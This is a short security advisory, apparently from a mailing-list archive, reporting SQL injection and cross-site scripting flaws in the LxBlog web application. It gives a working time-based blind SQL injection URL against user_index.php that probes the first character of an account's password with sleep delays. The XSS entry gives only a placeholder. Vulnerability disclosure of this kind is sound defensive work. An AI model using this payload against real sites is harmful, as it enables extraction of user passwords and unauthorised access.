<<< Date Index >>>     <<< Thread Index >>>

LxBlog

######################### Securitylab.ir ########################
# Application Info:
# Name: LxBlog
# Website: http://www.lxblog.net
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql/Xss
# Risk: Medium
#===========================================================
# Sql Injection:
# http://site.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN 
pw_user i ON 1=1 WHERE i.uid =1 AND 
if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT 
JOIN pw_user i ON 1=1 WHERE i.uid    =1 AND 
if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
#
# Xss:
# 
http://site.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################